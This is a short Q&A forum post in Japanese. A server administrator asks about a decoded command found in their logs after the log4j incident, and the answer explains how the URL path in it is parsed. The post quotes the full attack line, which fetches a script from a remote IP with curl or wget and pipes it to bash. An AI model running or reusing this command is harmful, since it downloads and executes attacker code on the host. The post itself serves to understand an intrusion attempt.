最近log4jの問題が発生した後にサーバーログを見ている間、base64でエンコードされた興味深いコマンドが見つかりました(デコードされたバージョンは以下にあります)。
(curl -s 195.54.160.149:5874/66.228.37.152:80||wget -q -O- 195.54.160.149:5874/66.228.37.152:80)|bash
/サーバー名/ IPにaがあるホストのカールコマンドが表示されないため、興味があります。どういう意味ですか?これがソースIPをなりすます方法なのかと思います。これは言葉ではありません。たぶんサブネット設定(私にもわからない)でしょうか?
ベストアンサー1
これには特別な意味はありません。スラッシュはホストとポートをパスから切り離します。
curl 195.54.160.149:5874/66.228.37.152:80
/66.228.37.152:80195.54.160.149のポート5874に接続し、識別されたリソースの使用を要求します。
GET /66.228.37.152:80 HTTP/1.1
66.228.37.152:80Webサーバーから呼び出されるファイルをホストして、このようなものを直接設定できます。サーバーがパスで実行する操作は、サーバー所有者の設定によって異なります。